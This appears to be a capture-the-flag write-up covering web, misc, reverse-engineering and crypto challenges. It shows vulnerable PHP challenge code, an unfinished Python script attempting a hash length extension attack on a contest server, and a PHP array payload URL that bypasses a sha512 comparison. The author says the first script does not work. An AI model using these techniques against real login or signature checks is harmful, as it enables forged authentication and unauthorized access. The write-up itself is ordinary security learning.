Result
rank:19
score:1100
Web
1. Penetrate In [Unfinished]
Question
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
include 'secret.php';
@$username = $_POST["username"];
@$password = $_POST["password"];
if (isset($_COOKIE["hmac"])) {
if ($username === "admin" && $password != "admin") {
if ($_COOKIE["hmac"] === md5("$secret|$username|$password")) {
die("The flag is " . $flag);
}
}
} else {
setcookie("hmac", md5("$secret|admin|admin"), time() + (60 * 60 * 24 * 7));
show_source(__FILE__);
}
Answer
This problem need to use hash length extension attack to get the flag. But the problem is that I don’t have the length of the secret so I need to enumerate it. Actually, I haven’t find it yet.
I find the following tools and write a script to enumerate the length of the secret. I don’t know what’s the problem which I need to read others’ writeup.
The script is writen in python.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# -*- coding:utf-8 -*-
from urlparse import urlparse
from httplib import HTTPConnection
from urllib import urlencode
import json
import time
import os
import urllib
import requests
def gao(x, y):
#cookie = ""
cookie = {"hmac" : y}
r = requests.post("http://202.121.178.201:8081/", data={'username': 'admin', 'passowrd': x}, cookies = cookie)
resp = r.text
#print resp
#exit()
return resp
for i in xrange(10000):
#print i
#secret len = ???
find_hash = "../hash_extender/hash_extender --data admin --signature be9fcfa876db5f4184e1635ce6561de7 --format md5 -a sb --out-data-format=html --secret " + str(i) + " --quiet"
#print find_hash
calc_res = os.popen(find_hash).readlines()
#print calc_res
hash_value = calc_res[0][:32]
attack_padding = calc_res[0][32:]
attack_padding = urllib.quote(urllib.unquote(attack_padding)[::-1])
ret = gao(attack_padding, hash_value)
#print ret
if "The flag" in ret:
print ret
break
2. Shatter Sha512
Question
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
// can u break sha512 algorithm ?
error_reporting(-1);
include 'flag.php';
if (!isset($_GET['x']) || !isset($_GET['y'])) {
die(show_source(__FILE__));
}
$x = $_GET['x'];
$y = $_GET['y'];
if ($x != $y) {
if (hash("sha512", $x) === hash("sha512", $y)) {
echo $flag;
}
}
Answer
The key is to find that when php function hash(“sha512”,$x) is used to figure out whether two different variables are equal. If variable $x is array the function return false.
So the payload is http://202.121.178.201:8083?x[]=1&y[]=2.
MISC
1. Mystery Number
I get a string which is 5a6d78685a33746b4d4639354d48566661323477643139694e44557a4e6a52666144526f4e4638324e44593058336b3065545239.
I find that it just has 0-9 and a-e. So I guess it is a hex number. I translate it to hex format by a website.
Then I get a string ZmxhZ3tkMF95MHVfa24wd19iNDUzNjRfaDRoNF82NDY0X3k0eTR9.
And then I use Base 64 decode to get the flag.
2. Easy Traffic Analyze
I get a file named flag.pcap. The pcap format file can be loaded on wireshark which consists of an application programming interface (API) for capturing network traffic. But it lost the pcap header. I find a website which introduces the pcap header and get the example header it offers and add it to the file.
Then I open the file by Wireshark. I use File > Export Objects > HTTP get three files which is upload.php, upload(1).php and test.php. I use binwalk to find the content of upload.php and the result is that it is a ZIP archive data.
Then I rename the upload.php to flag.zip and unzip it. After that, I get a flag1.png. I use binwalk -e flag.png to get two file from flag1.png whose name are 5B and 5B.zlib.
I write a python script to output the content of 5B.zlib and find the flag at the end of the file.
1
2
3
import zlib
data = open('5B.zlib','rb').read()
print data
In the course of finding the method to solve the problem, I find some useful tools, such as binwalk, dd,unzip.
A dd example:dd if=carter.jpg of=carter-1.jpg skip=140147 bs=1
Reverse
1. Babyre
I get a pyc file which contain byte code and Python interpreter complies the sources to it. I change it to py file by a tool.
Then I read the code and get the encode method. I write a decode script to get the flag.
1
2
3
4
5
6
7
8
9
10
11
from hashlib import md5
def md5raw(s):
return bytearray(md5(s).digest())
def xor(a, b):
assert len(a) == len(b)
return bytearray([ i ^ j for i, j in zip(a, b) ])
flag = bytearray('\xa5\xc6\xe6\xeca\x0c:ED\xed#\x19\x94LF\x11\x17\xc4.\xeb\xa1\xc2|\xc 1<\xa9\\A\xde\xd22\n')
for i in range(16):
flag[:16], flag[16:] = flag[16:], flag[:16]
flag[:16] = xor(flag[:16], md5raw(flag[16:]))
print flag
Crypto
1. AES-Server
I get a server.py which tell me that the server runs a AES CBC decrypt program. I should enter IV and enc to construct a plaintext whose beginning string is admin. After learning the theory,
And I find that if I don’t change variable enc, the secret and the enc’s result after block cipher decryption will never change. So I set IV equal to 0 at first and get a string named temp. Then xor hex(admin) and temp, I got the IV. Use this IV and enc, I construct the plaintext begin with amin and get the flag.